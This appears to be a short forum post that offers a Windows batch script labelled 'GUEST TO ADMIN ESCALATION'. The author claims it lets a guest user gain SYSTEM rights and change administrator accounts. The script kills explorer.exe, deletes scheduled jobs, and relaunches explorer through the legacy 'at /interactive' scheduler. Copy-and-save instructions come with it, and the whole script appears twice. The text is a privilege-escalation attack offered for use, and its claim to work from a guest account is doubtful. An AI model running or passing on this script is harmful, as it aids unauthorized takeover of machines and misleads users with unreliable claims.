i made is batch, you can run as a guest and login as a SYSTEM administrator and can change administrator users. it does evething automatly..
open a notepad > copy and paste the code > save as > and put any name with the extension .bat
@echo off
echo Login now as %computername% %date% %time%
at /delete /y
setlocal
ECHO GUEST TO ADMIN ESCALATION ::
set t=%time%
set h=%t:~0,2%
set m=%t:~3,2%
set s=%t:~6,2%
:: reduced strings to simple integers ::
if "%h:~0,1%"==" " set h=%h:~1%
if "%m:~0,1%"=="0" set m=%m:~1%
if "%s:~0,1%"=="0" set s=%s:~1%
ECHO start at %time% %date%
set x=70
ECHO :: calculated hour and minute to run ::
set /a x=s + x
set /a s="x %% 60"
set /a x=m + x / 60
set /a m="x %% 60"
set /a h=h + x / 60
set /a h="h %% 24"
ECHO now press ENTER and wait few seconds.
pause
taskkill /f /IM explorer.exe
at %h%:%m% /interactive "explorer.exe"
sleep 5
:END
open a notepad > copy and paste the code > save as > and put any name with the extension .bat
@echo off
echo Login now as %computername% %date% %time%
at /delete /y
setlocal
ECHO GUEST TO ADMIN ESCALATION ::
set t=%time%
set h=%t:~0,2%
set m=%t:~3,2%
set s=%t:~6,2%
:: reduced strings to simple integers ::
if "%h:~0,1%"==" " set h=%h:~1%
if "%m:~0,1%"=="0" set m=%m:~1%
if "%s:~0,1%"=="0" set s=%s:~1%
ECHO start at %time% %date%
set x=70
ECHO :: calculated hour and minute to run ::
set /a x=s + x
set /a s="x %% 60"
set /a x=m + x / 60
set /a m="x %% 60"
set /a h=h + x / 60
set /a h="h %% 24"
ECHO now press ENTER and wait few seconds.
pause
taskkill /f /IM explorer.exe
at %h%:%m% /interactive "explorer.exe"
sleep 5
:END